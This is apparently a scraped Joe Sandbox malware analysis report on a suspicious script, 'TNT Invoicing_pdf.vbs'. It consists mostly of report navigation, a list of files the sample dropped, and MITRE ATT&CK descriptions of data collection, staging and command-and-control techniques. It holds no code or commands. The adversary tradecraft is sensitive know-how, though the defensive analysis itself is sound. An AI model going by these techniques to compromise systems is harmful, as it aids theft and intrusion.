Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TNT Invoicing_pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\DesktopPic\PicList.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\-2-2FfKI

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyiayc1.1li.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_th4egcug.bll.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqlp3gfd.lqx.ps1

Static File Info

General

File Icon

Network Behavior

Windows Analysis Report
TNT Invoicing_pdf.vbs

Function 004173E3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042AF33 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 01032B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre